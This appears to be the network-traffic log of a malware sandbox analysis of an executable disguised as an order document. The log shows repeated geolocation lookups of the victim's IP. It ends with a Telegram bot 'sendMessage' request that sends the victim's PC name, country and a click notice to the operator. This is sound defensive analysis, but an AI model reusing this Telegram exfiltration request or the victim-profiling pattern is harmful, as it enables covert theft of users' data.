                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1936&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1505154&cwnd=154&unsent_bytes=0&cid=437581b2f16467f8&ts=463&x=0"
                                                                                                                                                2024-11-21 08:01:28 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.449806188.114.96.34437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:01:30 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                2024-11-21 08:01:30 UTC849INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:30 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 361
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 139999
                                                                                                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XjjhRpriMtDOGk%2FnDILR2RpMNtf4lx7l5ajezYaqWcpOyN7HIobJnGhMyJ1nV5yKvkuZHg7Q0DZRFuqKUXVzC4TEKeADo80Qcficj1DgamVXBTs7yw7KYR%2B9hUGbz3Lypi5f50j3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e5f26f61d5f430e-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1582&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1812538&cwnd=178&unsent_bytes=0&cid=83e0005ad4fe71ee&ts=449&x=0"
                                                                                                                                                2024-11-21 08:01:30 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.449814188.114.96.34437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:01:33 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-21 08:01:33 UTC857INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:33 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 361
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 140002
                                                                                                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WwBLmy%2Fjt9s%2B7mJM2x5tN91P2bfxTYUcF%2FuW%2FMgyWLBGE6ELNi93wGyMa4Im5rf4wCJMNJoGNuA2ZPS3%2BhvlsZ2rGj2AEFIe2d0Sva4%2FdEK8YZaWVNtAlZsuBrnLH37w8DD7VQQ3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e5f270a299641a9-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1741&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1696687&cwnd=204&unsent_bytes=0&cid=23a897686af3337a&ts=457&x=0"
                                                                                                                                                2024-11-21 08:01:33 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.449825188.114.96.34437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:01:36 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-21 08:01:37 UTC851INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:36 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 361
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 140005
                                                                                                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MV8Nxo7GPznMpmwlKJN%2BScWAevt4cxDmCHLBRRWH8JdN3oCMrEOEX%2FI9c6YQzturUjDopSubenn7IpAt%2BEooLG8l0AMwjagha9ZcPvHPQmOJoHPVH5PBYOp1BhaF6yLNt2AUwuUc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e5f271d5cff32e4-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1788&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1581798&cwnd=145&unsent_bytes=0&cid=4075eb58b87d5689&ts=451&x=0"
                                                                                                                                                2024-11-21 08:01:37 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.449833188.114.96.34437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:01:39 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-21 08:01:40 UTC853INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:39 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 361
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 140008
                                                                                                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J7vXCTFNLL2MlgseCPjmT8l88Moyd%2FoeUBksyENYNdq32Mxixoz9ZKzDdSxByeRUbiD%2FBQpeIkm1KXF4FT3%2BaxuPDh4750je7tm9qBKNgK2KtE9P1TBz8SE8IiExvX%2BhUiZy6dv9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e5f27308ab17286-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2275&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1291463&cwnd=240&unsent_bytes=0&cid=68660393d41762f6&ts=460&x=0"
                                                                                                                                                2024-11-21 08:01:40 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.449842188.114.96.34437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:01:42 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-21 08:01:43 UTC857INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:43 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 361
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 140012
                                                                                                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0gnet9nWPe31DGAbo7f9g%2BaBYGMmy%2BMVxzOgegpvmYkvEtxaTiZ%2FLrUAPCSBWALiK3HFTX8jyTMz3qujU3E%2FqLe7oMH%2B4g%2FVqdIG0mRYfrPSdSwEzanXtWgp435m8k6vLrw1tqqC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e5f274449425e7c-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1685&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1716637&cwnd=187&unsent_bytes=0&cid=d34e4d417a7dfe1e&ts=456&x=0"
                                                                                                                                                2024-11-21 08:01:43 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.449851188.114.96.34437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:01:45 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-21 08:01:46 UTC855INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:46 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 361
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 140015
                                                                                                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLGXS8gFT%2B4gWUiQOpNaL3CsM5oMdom%2BIRbU5Cmr4d2gW3uKC9TWUBaBOrBfKI%2BCw4I84Uuu6sY7nH4o1d0X%2FwE2lDxLmuwljeN4CDJ7pxjAkcIvRP8hJIP%2FqHsRNA1oiNLUabG8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e5f275809008cdd-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1804&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1544973&cwnd=170&unsent_bytes=0&cid=5e60a042f1240c22&ts=459&x=0"
                                                                                                                                                2024-11-21 08:01:46 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                8192.168.2.449859188.114.96.34437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:01:49 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-21 08:01:49 UTC857INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:49 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 361
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 140018
                                                                                                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ewrXjXlxuNly9oWJHizS3D1TvHKtZ4y81gpoqkVp8QzIlkSEJ4IrGCvyNs88W3smG63gnwEp29tK%2Be1zsYhVB35qLoaiVLx35NQy%2Fq%2F23u4%2BifuaAzRV4hMXQ2%2ByREF8%2BTz0Ysv6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e5f276b986f7281-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1804&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1552365&cwnd=228&unsent_bytes=0&cid=450f86fc22298d86&ts=469&x=0"
                                                                                                                                                2024-11-21 08:01:49 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                9192.168.2.449870188.114.96.34437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:01:53 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-11-21 08:01:53 UTC857INHTTP/1.1 200 OK
                                                                                                                                                Date: Thu, 21 Nov 2024 08:01:53 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 361
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 140022
                                                                                                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h058nOJYq2otra9X0qZxsJ6ysNjgWbdI2rzFWC%2BG%2BojmrMJTaKfXpJAJ0gp6doBQkoIgYCq9xWcHmdnWgobE2kJ7gcf1mcY%2FOKROI%2FRp2GnpNeIAnGslFv4X4c18aPOh%2FfFG9%2BRy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e5f2784684643fb-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1763&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1647855&cwnd=179&unsent_bytes=0&cid=03567dd58e37f8e2&ts=453&x=0"
                                                                                                                                                2024-11-21 08:01:53 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                10192.168.2.449876149.154.167.2204437832C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-11-21 08:01:55 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:897506%0D%0ADate%20and%20Time:%2022/11/2024%20/%2006:52:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20897506%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                Host: api.telegram.org
                                                                                                                                                Connection: Keep-Alive
